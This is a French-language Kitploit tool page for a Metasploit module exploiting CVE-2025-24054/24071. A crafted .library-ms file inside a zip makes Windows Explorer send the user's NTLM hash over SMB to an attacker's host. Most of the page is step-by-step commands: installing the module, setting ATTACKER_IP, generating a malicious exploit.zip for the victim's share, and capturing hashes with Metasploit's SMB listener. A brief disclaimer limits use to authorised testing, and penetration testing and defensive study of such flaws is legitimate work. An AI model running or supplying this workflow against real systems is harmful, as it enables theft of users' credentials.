Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24054-24071---Metasploit-Module — Module Metasploit pour exploiter CVE-2025-24054 (ex 24071). Exploit de fuite NTLM intégré dans Metasploit pour les vecteurs d'attaque basés sur des bibliothèques Windows. | Kitploit
Outils/GitHubGitHub/securitylayer404/cve-2025-24054-24071---metasploit-module
Frameworks d'ExploitationGénération de PayloadsExploitationTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubsecuritylayer404/cve-2025-24054-24071---metasploit-module

CVE-2025-24054-24071---Metasploit-Module

Module Metasploit pour exploiter CVE-2025-24054 (ex 24071). Exploit de fuite NTLM intégré dans Metasploit pour les vecteurs d'attaque basés sur des bibliothèques Windows.

Voir le dépôt
1il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-24054/24071 - Metasploit Module

Aperçu

La vulnérabilité se produit pendant le processus d'extraction d'un fichier .zip. En interagissant avec un fichier .library-ms spécialement conçu, l'Explorateur Windows traite le schéma XML interne et lance automatiquement une demande d'authentification SMB vers un chemin distant contrôlé par l'attaquant.

Ce comportement permet l'exfiltration du hash NTLM de l'utilisateur sans nécessiter d'interaction supplémentaire au-delà de la décompression du fichier. Pour voir une preuve de concept, je vous recommande de visiter le lien suivant : Fluffy - HTB.

⚠️ Note critique :

Bien qu'à l'origine cette vulnérabilité ait été diffusée sous le nom de CVE-2025-24071, elle est actuellement suivie officiellement sous le nom de CVE-2025-24054.

📌 Installation

Cloner le dépôt :

root@kitploit:~
❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git
❯ cd CVE-2025-24071

Copier le module dans le répertoire de Metasploit :

root@kitploit:~
❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/

Si le répertoire n'existe pas, créez-le avec :

root@kitploit:~
❯ mkdir -p ~/.msf4/modules/auxiliary/server/

Ensuite, copiez à nouveau le module.

📌 Utilisation

Démarrer Metasploit et charger le module :

root@kitploit:~
❯ msfconsole -q
❯ use auxiliary/server/ntlm_hash_leak

Si le module se charge correctement, vous pourrez voir les options pour le configurer :

root@kitploit:~
❯ show options

Module options (auxiliary/server/ntlm_hash_leak):

   Name          Current Setting       Required  Description

   ----          ---------------       --------  -----------

   ATTACKER_IP                         yes       IP de l'attaquant (où s'exécute Responder/Impacket)

   FILENAME      exploit.zip           yes       Le nom du fichier ZIP

   LIBRARY_NAME  documents.library-ms  yes       Nom du fichier .library-ms

   SHARE_NAME    recurso               yes       Nom du partage fictif

Configurez le module et exécutez :

root@kitploit:~
❯ set ATTACKER_IP 0.0.0.0  # Remplacez par votre IP d'attaque

❯ set FILENAME exploit.zip  # Nom du payload que vous téléchargerez sur le SMB (machine cible)

❯ set LIBRARY_NAME malicious.library-ms  # Nom du fichier .library-ms

❯ set SHARE_NAME it_shared  # Nom du partage SMB

❯ run

Output : le module génère un fichier .zip qui doit être téléchargé sur le serveur SMB cible pour une exécution ultérieure par la victime.

root@kitploit:~
[+] exploit.zip stored at /home/user/.msf4/local/exploit.zip
[+] Fichier enregistré dans : /home/user/.msf4/local/exploit.zip
[*] Auxiliary module execution completed

Enfin, utilisez le module de capture SMB de Metasploit pour recevoir les hashes NTLM :

root@kitploit:~
❯ use auxiliary/server/capture/smb
❯ set SRVHOST 0.0.0.0  # Remplacez par votre IP d'attaque
❯ run

Si vous avez des problèmes pour démarrer le serveur SMB depuis Metasploit :

  • Exécutez msfconsole en tant que root
  • Assurez-vous que le fichier ntlm_hash_leak.rb ait les permissions appropriées pour être accessible par root

⚠️ Avertissement

Ce module a été développé à des fins éducatives et de tests autorisés uniquement. L'utilisation non autorisée de ce type d'outils peut être illégale.

🕷 Auteur

Security Layer

Télécharger l’outil